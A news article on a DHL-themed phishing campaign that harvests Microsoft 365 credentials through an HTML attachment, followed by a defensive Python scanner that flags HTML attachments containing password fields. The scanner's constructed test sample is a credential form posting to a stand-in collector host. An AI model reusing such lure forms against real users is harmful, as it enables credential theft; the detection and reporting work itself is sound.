DHL fake email used to bypass Microsoft 365 accounts

Published January 20, 2023
Author: Ash Khan

A new phishing campaign impersonates the delivery company DHL.

According to specialists, a newly discovered phishing campaign impersonates the logistics company DHL in order to acquire Microsoft 365 credentials from victims in the education field.

Cybersecurity experts from Armorblox recently found the large phishing campaign. More than 10,000 emails were sent to inboxes belonging to “private education institutions”.

The email is designed to appear to be from DHL, with the business branding and tone of voice one would expect from the transportation giant. The email, labeled “DHL Shipping Document/Invoice Receipt”, tells the receiver that a customer delivered a shipment to the incorrect address and that the proper delivery address must be given.

False login prompt

The email includes an attachment, labeled “Shipping Document Invoice Receipt”. When opened, it appears to be a blurred-out preview of a Microsoft Excel file.

A Microsoft login screen appears above the blurred-out document. It attempts to fool victims into believing they must sign in to their Microsoft 365 accounts to read the file’s contents. If the victims supply their login credentials, the attackers receive them directly.

Armorblox revealed that the email attack leveraged language as its primary attack vector to circumvent both Microsoft Office 365 and EOP email security. These native email security layers are able to stop large spam and phishing campaigns, known viruses and dangerous URLs. The targeted email attack, however, evaded Microsoft email security because it had no harmful URLs or links and instead included an HTML file containing a malicious phishing form.

According to the researchers, the attackers utilized a genuine domain, allowing them to avoid Microsoft’s email authentication checks.
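A mail-gateway check for the pattern described above, an HTML attachment carrying a login form in a message whose body has no links, as an added example that is not from Armorblox or the original article. The sample messages, the addresses and the `collector.example` host are constructed for illustration.

```python
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser

class FormFinder(HTMLParser):
    """Records password inputs and absolute form targets in an HTML document."""
    def __init__(self):
        super().__init__()
        self.has_password = False
        self.form_targets = []

    def handle_starttag(self, tag, attrs):
        attr = {k: (v or "") for k, v in attrs}
        if tag == "input" and attr.get("type", "").lower() == "password":
            self.has_password = True
        elif tag == "form" and attr.get("action", "").lower().startswith(("http://", "https://", "//")):
            self.form_targets.append(attr["action"])

def scan_message(raw: bytes) -> list:
    """Return one finding per HTML attachment that contains a password field."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html"))
        if not is_html:
            continue
        finder = FormFinder()
        finder.feed((part.get_payload(decode=True) or b"").decode("utf-8", errors="replace"))
        if finder.has_password:
            findings.append({"attachment": name, "form_targets": finder.form_targets})
    return findings

def build_sample(html: str, filename: str) -> bytes:
    """Build a constructed test message with one HTML attachment."""
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = "sender@example.com", "user@example.org", "Constructed sample"
    m.set_content("Please see the attached document.")  # body carries no URLs
    m.add_attachment(html.encode(), maintype="text", subtype="html", filename=filename)
    return m.as_bytes()

# Constructed samples: a credential form, and a harmless HTML receipt.
LURE = build_sample('<form action="https://collector.example/submit" method="post">'
                    '<input type="email" name="u"><input type="password" name="p"></form>', "document.html")
BENIGN = build_sample("<html><body><h1>Receipt</h1><p>Total: 10.00</p></body></html>", "receipt.html")

if __name__ == "__main__":
    print(scan_message(LURE))
    print(scan_message(BENIGN))
```

This is a static check: an attachment that builds its form with script at render time will not match, so it complements rather than replaces attachment sandboxing.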

Security Tips

Businesses can best protect themselves against phishing attacks by training their employees to recognize red flags in their inboxes, such as the sender’s email address, typos, spelling errors, a sense of urgency (legitimate emails almost never require the user to respond urgently), and unexpected links or attachments.